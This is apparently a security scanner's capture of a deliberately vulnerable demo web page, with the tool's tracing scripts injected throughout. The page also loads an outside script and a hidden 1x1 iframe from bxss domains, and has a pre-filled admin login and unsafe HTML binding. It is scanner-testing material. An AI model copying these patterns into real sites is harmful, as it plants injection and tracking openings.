<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="1909442962"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script
src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable 
HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal" data-arachni-id="73596745">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... <i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div data-ng-include="'/static/app/partials/itemsList.html'" class="ng-scope"><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> </div> <div class="pull-right"> <div ng-show="filter==''">Page <span ng-bind-html-unsafe="pageStr" style="font-weight: bold;" class="ng-binding">0</span> </div> </div> <div class="pull-right"> <div ng-show="filter!=''" style="display: none;">Filtering 
for host <b class="ng-binding"></b></div> </div> </div> <!-- ngRepeat: item in items | filter:filter | filter:searchText --><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/twitter.com" class="ng-binding" href="#/all/filter/twitter.com" data-arachni-id="-1830313082">twitter.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=696a3680438a7af53a0a54d3d26469bf" href="/like?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=696a3680438a7af53a0a54d3d26469bf" href="/comment?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=696a3680438a7af53a0a54d3d26469bf" href="/report?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872" href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in 
item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/www.eff.org" class="ng-binding" href="#/all/filter/www.eff.org" data-arachni-id="-313525244">www.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=6cc95ec82a3e1524115d692b9386d60a" href="/like?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=6cc95ec82a3e1524115d692b9386d60a" href="/report?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="2002938079"><i 
class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/ssd.eff.org" class="ng-binding" href="#/all/filter/ssd.eff.org" data-arachni-id="-947703951">ssd.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" 
ng-href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios" href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. 
<br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/blog.github.com" class="ng-binding" href="#/all/filter/blog.github.com" data-arachni-id="1782715074">blog.github.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in 
item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/github" target="_blank" class="ng-binding" href="http://twitter.com/github" data-arachni-id="-279974877">@github</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. <br><br> </div> </div> </div> </div> <ul class="pager ng-scope"> <li><a ng-href="#/popular/page/-1" ng-show="page>0" href="#/popular/page/-1" style="display: none;">Previous</a></li> <li><a ng-href="#/popular/page/1" ng-show="filter==''" href="#/popular/page/1" data-arachni-id="2424595">Next</a></li> </ul></div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">unknown is coming from <b>unknown</b> and has visited this page <b>1</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 
2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); 
_arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html>
This is the original HTTP response body.
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link
href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. 
</p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). 
Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript 